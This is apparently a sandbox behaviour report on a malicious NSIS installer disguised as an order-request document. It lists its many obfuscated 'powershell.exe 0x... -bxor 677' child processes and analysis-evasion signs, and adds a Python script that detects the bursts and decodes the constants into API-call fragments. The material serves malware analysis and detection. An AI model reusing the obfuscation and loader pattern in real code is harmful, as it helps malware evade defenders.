    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_0040327D
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsu4A62.tmp
    Source: classification engine | Classification label: mal68.troj.evad.winEXE@166/5@0/0
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00402095 CoCreateInstance | 0_2_00402095
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00404591 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW | 0_2_00404591
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    Source: Yara match | File source: Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 5356, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | File created: C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll (dropped file)
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | File created: C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll (dropped file)
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process information set: NOOPENFILEERRORBOX (3 identical events)
    Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX (57 identical events)

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Window / User API: threadDelayed 423
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe TID: 5868 | Thread sleep time: -42300s >= -30000s
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00406375 FindFirstFileW,FindClose,0_2_00406375
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405823
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | API call chain: ExitProcess graph end node graph_0-5043
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | API call chain: ExitProcess graph end node graph_0-5046
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x70203289 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_007E1112 wsprintfA,GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,CharUpperBuffW,GlobalReAlloc,GlobalLock,lstrcatW,EnumDisplaySettingsA,GlobalSize,EnumDisplaySettingsA,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_007E1112
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00406054 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406054
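The process-creation entries above (both the ten flagged under "Mass process execution to delay analysis" and the longer list that follows) all have the shape `powershell.exe 0x6B6570CB -bxor 677`: a bare integer expression that PowerShell evaluates, prints to stdout and exits. The script below is an added example written for this page; it is not Joe Sandbox code and not code recovered from the sample. It does two things with constructed process-creation records: it flags a parent that spawns a burst of such children, and it XORs each constant with the key 677 (0x2A5) and renders the 32-bit result as four big-endian bytes. Applied to the constants taken from the report in the order listed, the first six give "kern", "el32", "::Cr", "eate", "File", "A(m ", i.e. the start of an NSIS System::Call string for kernel32::CreateFileA; the constants 0x3A3A54CC, 0x727477C4, 0x6C416EC9, 0x6F632ACC give "::VirtualAlloc(i" and 0x3A3A51C0 through 0x6E7467D7 give "::SetFilePointer". The big-endian byte order is an observation from these values, not a documented property of the loader. The timestamps, PIDs, the stand-in parent path and the benign explorer.exe-launched PowerShell in the sample data are invented; the command lines are the report's own.

```python
"""Added example (not Joe Sandbox's code): triage the PowerShell children listed above.

Every child is `powershell.exe <hex constant> -bxor 677`, a bare integer expression
that PowerShell evaluates, prints and exits. The script (1) flags a parent that spawns
a burst of such children and (2) XORs each constant with the key and renders the
32-bit result as four big-endian bytes, which turns the report's constants into text.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A command line that consists of nothing but one PowerShell bitwise expression.
JUNK_PS = re.compile(
    r"^\S*powershell(?:\.exe)?\s+"
    r"(?P<lhs>0x[0-9a-f]+|\d+)\s+-b(?P<op>xor|and|or)\s+(?P<rhs>0x[0-9a-f]+|\d+)\s*$",
    re.I,
)


def _to_int(token):
    return int(token, 16) if token.lower().startswith("0x") else int(token, 10)


def parse_junk(cmdline):
    """Return (lhs, op, rhs) if cmdline is a lone bitwise expression, else None."""
    m = JUNK_PS.match(cmdline.strip())
    if not m:
        return None
    return _to_int(m["lhs"]), m["op"].lower(), _to_int(m["rhs"])


def decode_constant(constant, key):
    """XOR one 32-bit constant with key; show the result as 4 big-endian characters.
    Bytes outside printable ASCII are rendered as '.' (assumed byte order, see above)."""
    raw = ((_to_int(constant) ^ key) & 0xFFFFFFFF).to_bytes(4, "big")
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)


def decode_constants(constants, key):
    """Concatenate the decoded chunks of several constants, in the given order."""
    return "".join(decode_constant(c, key) for c in constants)


def find_bursts(events, min_children=5, window=timedelta(seconds=60)):
    """Parents that spawn at least min_children junk PowerShell children inside window.
    Returns [(ppid, parent_image, total_junk_children, first_ts, last_ts)]."""
    by_parent = defaultdict(list)
    for ev in events:
        if parse_junk(ev["cmdline"]) is not None:
            by_parent[(ev["ppid"], ev["parent"])].append(ev["ts"])
    hits = []
    for (ppid, parent), times in by_parent.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= min_children:
                hits.append((ppid, parent, len(times), times[0], times[-1]))
                break
    return hits


def decode_children(events):
    """Decode the junk children of every flagged parent, concatenated in creation order."""
    flagged = {(h[0], h[1]) for h in find_bursts(events)}
    out = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["ppid"], ev["parent"])
        parsed = parse_junk(ev["cmdline"])
        if key in flagged and parsed is not None:
            lhs, op, rhs = parsed
            # Only XOR is invertible into text; other operators are shown as unknown.
            out[key] = out.get(key, "") + (decode_constant(hex(lhs), rhs) if op == "xor" else "????")
    return out


# Constructed sample events (invented timestamps, PIDs and a stand-in parent path);
# the command lines are the first six PowerShell children listed in the report.
PS_IMAGE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PARENT = r"C:\Users\user\Desktop\sample.exe"  # stands in for the report's sample
T0 = datetime(2022, 10, 5, 9, 26, 0)
REPORT_CONSTANTS = ["0x6B6570CB", "0x656C3197", "0x3A3A41D7",
                    "0x656176C0", "0x46696EC0", "0x41286F85"]
EVENTS = [
    {"ts": T0 + timedelta(seconds=3 * i), "ppid": 5356, "parent": PARENT,
     "pid": 6000 + i, "image": PS_IMAGE, "cmdline": f"powershell.exe {c} -bxor 677"}
    for i, c in enumerate(REPORT_CONSTANTS)
]
# A legitimate interactive PowerShell started from explorer.exe; it must not be flagged.
EVENTS.append({"ts": T0 + timedelta(seconds=7), "ppid": 4321,
               "parent": r"C:\Windows\explorer.exe", "pid": 7000, "image": PS_IMAGE,
               "cmdline": 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'})

if __name__ == "__main__":
    for ppid, parent, n, first, last in find_bursts(EVENTS):
        print(f"burst: {parent} (pid {ppid}) spawned {n} junk PowerShell children "
              f"between {first:%H:%M:%S} and {last:%H:%M:%S}")
    for (ppid, parent), text in decode_children(EVENTS).items():
        print(f"decoded from pid {ppid}: {text!r}")
```

Two caveats when reading the output. The report's process list is de-duplicated and incomplete (the analysis stopped on timeout and the cookbook comments say behaviour information is missing), so only fragments of the call strings reassemble from it. And the decoding only explains what the children are for; the pipe-reading routine at 0_2_007E1112 (CreatePipe, CreateProcessW, PeekNamedPipe, ReadFile) together with the dropped nsExec.dll is consistent with an NSIS script capturing each child's stdout, which is the usual way an NSIS installer gets a child's output back.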
    MITRE ATT&CK matrix (a number in front of a technique is the count of signatures in this report that map to it; techniques without a number did not match):

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
